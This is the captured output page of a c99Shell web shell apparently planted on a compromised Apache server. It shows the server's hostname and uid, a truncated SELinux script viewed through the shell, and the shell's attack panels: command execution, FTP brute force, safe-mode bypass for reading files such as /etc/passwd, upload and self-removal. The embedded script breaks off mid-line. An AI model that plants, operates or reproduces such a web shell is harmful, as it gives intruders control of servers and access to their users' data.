!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/sbin/   drwxr-xr-x
Free 52.24 GB of 127.8 GB (40.87%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     genhomedircon (11.36 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#! /usr/bin/python -E
# Copyright (C) 2004 Tresys Technology, LLC
# see file 'COPYING' for use and warranty information
#
# genhomedircon - this script is used to generate file context
# configuration entries for user home directories based on their
# default prefixes and is run when building the policy. Specifically, we
# replace HOME_ROOT, HOME_DIR, and ROLE macros in .fc files with
# generic and user-specific values.
#
# Based off original script by Dan Walsh, 
#
# ASSUMPTIONS:
#
# The file CONTEXTDIR/files/homedir_template exists.  This file is used to
# set up the home directory context for each real user.
# 
# If a user is not listed in CONTEXTDIR/seusers, he will default to user_u, prefix user
#
# "Real" users (as opposed to system users) are those whose UID is greater than
#  or equal STARTING_UID (usually 500) and whose login is not a member of
#  EXCLUDE_LOGINS.  Users who are explicitly defined in CONTEXTDIR/seusers
#  are always "real" (including root, in the default configuration).
#
#  

import sys, os, pwd, string, getopt, re
from semanage import *;
import selinux
import gettext
gettext.install('policycoreutils')

def grep(file, var):
	ret = ""
	fd = open(file, 'r')

	for i in  fd.readlines():
	    if re.search(var, i, 0) != None:
	        ret = i
                break
	fd.close()
	return ret

def findval(file, var, delim = ""):
	val = ""
	try:
		fd = open(file, 'r')
		for i in  fd.readlines():
			if i.startswith(var) == 1:
				if delim == "":
					val = i.split()[1]
				else:
					val = i.split(delim)[1]
				val = val.split("#")[0]
				val = val.strip()
		fd.close()
	except:
		val = ""
	return val

def getStartingUID():
	starting_uid = sys.maxint
	uid_min =  findval("/etc/login.defs", "UID_MIN")
	if uid_min != "":
		uid_min = uid_min.split("#")[0]
		uid_min = uid_min.strip()
		if int(uid_min) < starting_uid:
			starting_uid = int(uid_min)

	uid_min =  findval("/etc/libuser.conf", "LU_UIDNUMBER", "=")
	if uid_min != "":
		uid_min = uid_min.split("#")[0]
		uid_min = uid_min.strip()
		if int(uid_min) < starting_uid:
			starting_uid = int(uid_min)

	if starting_uid == sys.maxint:
		starting_uid = 500
	return starting_uid

def getDefaultHomeDir():
	ret = []
	homedir = findval("/etc/default/useradd", "HOME", "=")
	if homedir != "" and not homedir in ret:
		ret.append(homedir)
	
	homedir = findval("/etc/libuser.conf", "LU_HOMEDIRECTORY", "=")
	if homedir != "" and not homedir in ret:
		ret.append(homedir)
	
	if ret == []:
		ret.append("/home")

	# Add /export/home if it exists
	# Some customers use this for automounted homedirs
	if os.path.exists("/export/home"):
		ret.append("/export/home")

	return ret

def getSELinuxType(directory):
	val = findval(directory+"/config", "SELINUXTYPE", "=")
	if val != "":
		return val
	return "targeted"

def usage(rc=0, error = ""):
	if error != "":
		sys.stderr.write("%s\n" % error)
		rc = 1
	sys.stderr.write("Usage: %s [ -d selinuxdir ] [-n 
bool(false)

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0056 ]--